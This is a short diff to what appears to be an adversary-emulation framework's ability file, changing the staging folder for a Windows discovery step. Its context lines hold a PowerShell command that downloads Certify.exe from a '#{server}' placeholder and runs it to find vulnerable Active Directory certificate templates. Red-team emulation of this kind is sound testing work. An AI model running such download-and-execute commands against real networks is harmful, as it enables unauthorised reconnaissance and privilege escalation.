--- a/plugins/adversary_emulation/data/abilities/discovery/92cb926e-1e63-4ec3-9b47-certify-esc1.yml
+++ b/plugins/adversary_emulation/data/abilities/discovery/92cb926e-1e63-4ec3-9b47-certify-esc1.yml
@@ -9,7 +9,7 @@
     windows:
       psh:
         command: |
-          cd "C:\Users\Public";
+          cd "#{env.dir.stage}";
           Invoke-WebRequest -Uri "#{server}/file/download" -Method POST -Headers @{"file" = "Certify.exe"} -OutFile "Certify.exe";
           .\Certify.exe find /vulnerable
         parsers:
